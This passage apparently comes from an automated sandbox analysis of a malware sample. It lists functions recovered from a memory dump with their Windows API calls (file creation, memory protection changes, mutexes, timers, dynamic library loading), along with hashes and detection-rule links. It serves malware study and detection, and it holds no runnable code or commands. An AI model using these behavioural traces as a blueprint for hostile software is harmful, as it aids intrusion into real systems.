                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,04BBF1B3,00000000,04BBF1B4,00000080,00000000,00000000,04BC4C6A,00000000,04BBF1B3,?), ref: 04BB537E
                                                              • Part of subcall function 04BB533D: GetLastError.KERNEL32 ref: 04BB5388
                                                              • Part of subcall function 04BB533D: WaitForSingleObject.KERNEL32(000000C8), ref: 04BB53AD
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BB53CE
                                                              • Part of subcall function 04BB533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 04BB53F6
                                                              • Part of subcall function 04BB533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 04BB540B
                                                              • Part of subcall function 04BB533D: SetEndOfFile.KERNEL32(00000001), ref: 04BB5418
                                                              • Part of subcall function 04BB533D: CloseHandle.KERNEL32(00000001), ref: 04BB5430
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                                                            • String ID:
                                                            • API String ID: 796380773-0
                                                            • Opcode ID: 6d4abf98ba5671d0a2cfe3f21f619b483d1e3eef7539b5c118c55d6e3c7a9914
                                                            • Instruction ID: 122600637453218508ea620c15109abf589f3e2d31e4256ec0c66cd1fc744264
                                                            • Opcode Fuzzy Hash: 6d4abf98ba5671d0a2cfe3f21f619b483d1e3eef7539b5c118c55d6e3c7a9914
                                                            • Instruction Fuzzy Hash: EB513A71A04209AFDB10DFA5D8C5EAE7BB8EB08304F0540AAE609E7251E774BE55CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBF58E, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5B0
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5C1
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5D3
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5E5
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5F7
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF603
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID:
                                                            • API String ID: 1659193697-0
                                                            • Opcode ID: 2731a6b22c4576eac3ed087c75e80842f3681346970613c351e5e90b451e9752
                                                            • Instruction ID: 8c475055dab3db8185a3bffc906cb7c0a06c93a3829bebb65e9a16b4c19027c7
                                                            • Opcode Fuzzy Hash: 2731a6b22c4576eac3ed087c75e80842f3681346970613c351e5e90b451e9752
                                                            • Instruction Fuzzy Hash: 0941EF71E00209AFDB14DFA9CC80ABEB7F9FF58204B14C5ADD596E3211E7B4E9458B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA2415, Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA5D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04BB4F14,00000000,00000000,00000000,?,04BB1CF2,00000000,00000000,00000000,00000000), ref: 04BA5D17
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BA24F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BA250B
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BA251C
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BA2531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BA2569
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 2349942465-0
                                                            • Opcode ID: 53698b27ad725862426bc2d55182dd14fa7034e071efe41f144dc8d170bc240c
                                                            • Instruction ID: f08d5185d75642efd540f92391c8f1fe4af6314f9005f70dea495e6e31518359
                                                            • Opcode Fuzzy Hash: 53698b27ad725862426bc2d55182dd14fa7034e071efe41f144dc8d170bc240c
                                                            • Instruction Fuzzy Hash: 62318EFB919142AFD3010B24ACC89DDFBE1EFB9226B1540DDE1645B106D13D789B8BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB878B, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB8D4F: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04BB8D5B
                                                              • Part of subcall function 04BB8D4F: SetLastError.KERNEL32(000000B7,?,04BB879F,?,?,00000000,?,?,?), ref: 04BB8D6C
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04BB87BF
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BB8897
                                                              • Part of subcall function 04BACDCB: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BACDE5
                                                              • Part of subcall function 04BACDCB: CreateWaitableTimerA.KERNEL32(04BCC1A8,00000001,?), ref: 04BACE02
                                                              • Part of subcall function 04BACDCB: GetLastError.KERNEL32(?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE13
                                                              • Part of subcall function 04BACDCB: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE53
                                                              • Part of subcall function 04BACDCB: SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE72
                                                              • Part of subcall function 04BACDCB: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE88
                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BB8880
                                                            • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BB8889
                                                              • Part of subcall function 04BB8D4F: CreateMutexA.KERNEL32(04BCC1A8,00000000,?,?,04BB879F,?,?,00000000,?,?,?), ref: 04BB8D7F
                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 04BB88A4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                            • String ID:
                                                            • API String ID: 1700416623-0
                                                            • Opcode ID: 674aaa340e9469b79e07ac2203abbcdc298773d65b55089cbb9c5d92c925697b
                                                            • Instruction ID: 7c68b562491c9125ae014a68fb55747b6a5b3e4a241d863e33a49bb8f6889f5d
                                                            • Opcode Fuzzy Hash: 674aaa340e9469b79e07ac2203abbcdc298773d65b55089cbb9c5d92c925697b
                                                            • Instruction Fuzzy Hash: 37318071A00204AFCB10AF75ECC48BA7FBEEB9835471405A7E885D7290DA74AC01DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBD680, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 04BBD702
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BBD71B
                                                            • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 04BBD728
                                                            • lstrlen.KERNEL32(04BCD3A4,?,?,?,?,?,00000000,00000000,?), ref: 04BBD73A
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 04BBD76B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                            • String ID:
                                                            • API String ID: 2734445380-0
                                                            • Opcode ID: 20ecad689beb397475f314246f658416c0ead5102a7fdcf98be1385fadacaacd
                                                            • Instruction ID: 531f530e376e7f2efbd00ffea6d883956bbe7fd860ff93ce80324f9c50054b1f
                                                            • Opcode Fuzzy Hash: 20ecad689beb397475f314246f658416c0ead5102a7fdcf98be1385fadacaacd
                                                            • Instruction Fuzzy Hash: BE316F75500209BFDB11DF95DC88EEE7BB8EF49310F148469FC1592200DB78EA15DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBD528, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA5D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04BB4F14,00000000,00000000,00000000,?,04BB1CF2,00000000,00000000,00000000,00000000), ref: 04BA5D17
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BBD552
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BBD565
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BBD576
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04BBD5E1
                                                            • InterlockedIncrement.KERNEL32(04BCC33C), ref: 04BBD5F8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 3915436794-0
                                                            • Opcode ID: 56bcaf9397dfa709caea6fb428e3e50a0d332e1b1c3df94bd6c37cadcd845c77
                                                            • Instruction ID: 69281128d73a41fec1e9d4e384730c3582e0dc0a1577d124ff28818d2abcefd3
                                                            • Opcode Fuzzy Hash: 56bcaf9397dfa709caea6fb428e3e50a0d332e1b1c3df94bd6c37cadcd845c77
                                                            • Instruction Fuzzy Hash: 2F31A0326047069FDB21CF28D8C496ABBB9FB98325B00455EF89A83250D779FC11CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBD9AF, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,04BB228F,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BBD9CF
                                                            • LoadLibraryA.KERNEL32(?), ref: 04BBD9E4
                                                            • LoadLibraryA.KERNEL32(?), ref: 04BBDA00
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBDA15
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBDA29
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressProc
                                                            • String ID:
                                                            • API String ID: 1469910268-0
                                                            • Opcode ID: 1380cd67ae06ba3156868d683b627fb4bf49a7d61fd9c536e726ad0612e8204e
                                                            • Instruction ID: 60e702900f218dba3dab5d57ebfc7bdac448d36ba45d952589cf55333a463ddd
                                                            • Opcode Fuzzy Hash: 1380cd67ae06ba3156868d683b627fb4bf49a7d61fd9c536e726ad0612e8204e
                                                            • Instruction Fuzzy Hash: 52316976A442058FCB00CF68E8D1AA57BF8FB5D714B09429BE648D7311D778FC068B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAA4A1, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • DeleteFileA.KERNEL32(00000000,000004D2), ref: 04BAA4C4
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04BAA4CD
                                                            • GetLastError.KERNEL32 ref: 04BAA4D7
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BAA596
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 3543646443-0
                                                            • Opcode ID: 39f6acf9ed87932783a0a8ecca805bd452e8a5596a71cc4e562608799cee3b19
                                                            • Instruction ID: 0163621becc45f27d86c63d625f1b8b090d2a596340b204df9b3ab5dab071b89
                                                            • Opcode Fuzzy Hash: 39f6acf9ed87932783a0a8ecca805bd452e8a5596a71cc4e562608799cee3b19
                                                            • Instruction Fuzzy Hash: 6A21B5B2545114ABD320BBA5ECC8DDA3BADEF4D204F094062B704C7145D668FA14C7B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAD9B3, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB81D1: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB81DD
                                                              • Part of subcall function 04BB81D1: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04BB81F3
                                                              • Part of subcall function 04BB81D1: _snwprintf.NTDLL ref: 04BB8218
                                                              • Part of subcall function 04BB81D1: CreateFileMappingW.KERNEL32(000000FF,04BCC1A8,00000004,00000000,00001000,?), ref: 04BB8234
                                                              • Part of subcall function 04BB81D1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BB8246
                                                              • Part of subcall function 04BB81D1: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04BB827E
                                                            • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BAD9EE
                                                            • CloseHandle.KERNEL32(?), ref: 04BAD9F7
                                                            • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BADA3E
                                                            • GetLastError.KERNEL32(04BAA8B7,00000000,00000000), ref: 04BADA6D
                                                            • CloseHandle.KERNEL32(00000000,04BAA8B7,00000000,00000000), ref: 04BADA7D
                                                              • Part of subcall function 04BAA20E: lstrlenW.KERNEL32(?,?,00000000,73B74D40,?,?,04BC1C44,?,73B74D40), ref: 04BAA21A
                                                              • Part of subcall function 04BAA20E: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04BC1C44,?,73B74D40), ref: 04BAA242
                                                              • Part of subcall function 04BAA20E: memset.NTDLL ref: 04BAA254
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1106445334-0
                                                            • Opcode ID: 9e637b4236c787cf81c990ba2e22906fa971d5bf3e95b402fcc74c51c480f677
                                                            • Instruction ID: e919153d575ff68a4a246e300a2bc6ac000e3faff9861fab8cfb9fd739544ff5
                                                            • Opcode Fuzzy Hash: 9e637b4236c787cf81c990ba2e22906fa971d5bf3e95b402fcc74c51c480f677
                                                            • Instruction Fuzzy Hash: 05215075648204AFEB10EFB5DC81B9A7BADEB58714B0004AAE646E7550EB74FC128B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB5EFC, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04BB5A38,00000000,?,?), ref: 04BB5F1A
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?), ref: 04BB5F2A
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF), ref: 04BB5F56
                                                            • GetLastError.KERNEL32(?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?,00000000,?), ref: 04BB5F7B
                                                            • CloseHandle.KERNEL32(000000FF,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?,00000000), ref: 04BB5F8C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastReadSize
                                                            • String ID:
                                                            • API String ID: 3577853679-0
                                                            • Opcode ID: e5ebb8681514f43f68756fb8571076b5937b9f62556b8961bfae32838f0b0563
                                                            • Instruction ID: 95a66a152498373d10e8d1b1fdf353194e0aa0f472271206a30a08deee51dcad
                                                            • Opcode Fuzzy Hash: e5ebb8681514f43f68756fb8571076b5937b9f62556b8961bfae32838f0b0563
                                                            • Instruction Fuzzy Hash: 5811AF72200214BFDB315F64CCC4EFEBBADEB053A8F4141A6F995A7190D6B0AD4186E2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB6E52, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04BB6E63
                                                            • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 04BB6E7C
                                                            • StrTrimA.SHLWAPI(?,?), ref: 04BB6EA4
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 04BB6EB3
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 04BB6EEA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Trim$FreeHeap
                                                            • String ID:
                                                            • API String ID: 2132463267-0
                                                            • Opcode ID: 02192f8173d9d39e06e750c15b773360eb7f83b81f87043bd93792fa58828ce3
                                                            • Instruction ID: 698e5b35b436340149640c5d2046340a81d45e3476a8154e4e747e36d5a7543e
                                                            • Opcode Fuzzy Hash: 02192f8173d9d39e06e750c15b773360eb7f83b81f87043bd93792fa58828ce3
                                                            • Instruction Fuzzy Hash: DA118676600209BBE7219A69DCC5FEF7BACEB48750F140462BA08DB141DBB4FD0187E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB756D, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,010BB5A8,00000000,04BA1C48,?,?,?,04BACC9A,73B75520,?,04BB070F,00000000,00000000), ref: 04BB75A4
                                                            • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,04BACC9A,73B75520,?,04BB070F,00000000,00000000,?,00000000,04BA1C48,00000000), ref: 04BB75D4
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BB75E3
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BB7601
                                                            • GetLastError.KERNEL32(?,04BACC9A,73B75520,?,04BB070F,00000000,00000000,?,00000000,04BA1C48,00000000), ref: 04BB7611
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 653387826-0
                                                            • Opcode ID: c6bd19a574005556e042ba21f85216fba1dacf92964be83ed0f68b919888edb7
                                                            • Instruction ID: fb074f8deebfb02a4ec13751656b7d08c85ade901d5152d1c2eb663884f21d70
                                                            • Opcode Fuzzy Hash: c6bd19a574005556e042ba21f85216fba1dacf92964be83ed0f68b919888edb7
                                                            • Instruction Fuzzy Hash: C721D8B5600B05AFD711DFA9D9C499ABBF8FB08304B00456AEA5AE7710D7B4FD14CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA9100, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 04BA912E
                                                            • GetLastError.KERNEL32 ref: 04BA9151
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04BA9164
                                                            • GetLastError.KERNEL32 ref: 04BA916F
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BA91B7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 1671499436-0
                                                            • Opcode ID: b2219811a7c46c3443f9319c580143ce95c22be1d397acb0ee49088d9ad020fc
                                                            • Instruction ID: 779c24c0ba03fc12bbf3fef402842fcae08c98a8c39d2c5421b9428032250d29
                                                            • Opcode Fuzzy Hash: b2219811a7c46c3443f9319c580143ce95c22be1d397acb0ee49088d9ad020fc
                                                            • Instruction Fuzzy Hash: 0D218EB0508204FBEB208F65DCCDF5E7BB9EB44319F6008A9E142965A0D375ADA0EB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBED0E, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(04BA8E44,?,?,?,?,00000008,04BA8E44,00000000,?,?,04BAEE33,?,?,00000000,04BB227C,00000000), ref: 04BBED2B
                                                            • memcpy.NTDLL(04BA8E44,?,00000009,?,?,?,?,00000008,04BA8E44,00000000,?,?,04BAEE33,?,?,00000000), ref: 04BBED4D
                                                            • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 04BBED65
                                                            • lstrlenW.KERNEL32(00000000,00000001,04BA8E44,?,?,?,?,?,?,?,00000008,04BA8E44,00000000,?,?,04BAEE33), ref: 04BBED85
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,04BA8E44,00000000,?), ref: 04BBEDAA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3065863707-0
                                                            • Opcode ID: 43f5366266dc532285f4631656c8fb32f384e7355c11737e522b6f6670fa3897
                                                            • Instruction ID: dae5f77334a4831658177ede76b9aea79a965c3d87e3ac626f2c2c9226c854db
                                                            • Opcode Fuzzy Hash: 43f5366266dc532285f4631656c8fb32f384e7355c11737e522b6f6670fa3897
                                                            • Instruction Fuzzy Hash: 1D115135D04208FBDB119BA5D889FDE7BB8EB0C711F044452F955E7280D674EA48DB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBB895, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcmpi.KERNEL32(00000000,?), ref: 04BBB8C4
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BBB8D1
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BBB8E4
                                                            • lstrcmpi.KERNEL32(04BCC340,00000000), ref: 04BBB904
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BA447E,00000000), ref: 04BBB918
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                            • String ID:
                                                            • API String ID: 1266740956-0
                                                            • Opcode ID: 047f363289d03b72b2d067671c0abb997d9e7c27a2d4f7583fc1fe0eb2480067
                                                            • Instruction ID: 6f27af644eab7a207f211156de13465c39322ab1b57197dca702b188aecf61d2
                                                            • Opcode Fuzzy Hash: 047f363289d03b72b2d067671c0abb997d9e7c27a2d4f7583fc1fe0eb2480067
                                                            • Instruction Fuzzy Hash: 42114F32904209AFDB24CF59D8C9EA9BBB8FB58325F05419AE489D3251D778FD058BE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB5440, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04BA9999,00000000,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BB544A
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BB546E
                                                            • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04BB7991,?,?,?,00000000,?,00000000,00000000), ref: 04BB5475
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BB54BD
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BB54CC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2616531654-0
                                                            • Opcode ID: e5823f1c470c827a41213fba39abc0d150d75c064b155dbbd3ea950323158e5b
                                                            • Instruction ID: a15e011f5d33c8b724a2a5efadc1114dc581e2cd4e81587916d67a1d589457e4
                                                            • Opcode Fuzzy Hash: e5823f1c470c827a41213fba39abc0d150d75c064b155dbbd3ea950323158e5b
                                                            • Instruction Fuzzy Hash: 03119172204215BBD3309A69D8C8EBB77ECEB88705F058069F645D3144DB68EC15C772
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA24CF, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA5D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04BB4F14,00000000,00000000,00000000,?,04BB1CF2,00000000,00000000,00000000,00000000), ref: 04BA5D17
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BA24F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BA250B
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BA251C
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BA2531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BA2569
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 2349942465-0
                                                            • Opcode ID: a6dfd1954c7e80b549dc8a0c0ee7b0d25b3ff3d66b2658ef5b07f963d349e789
                                                            • Instruction ID: 8266cc7cea984c2f03c84e203cb694c0c657be8551aec7456e1b923d42d8d0ae
                                                            • Opcode Fuzzy Hash: a6dfd1954c7e80b549dc8a0c0ee7b0d25b3ff3d66b2658ef5b07f963d349e789
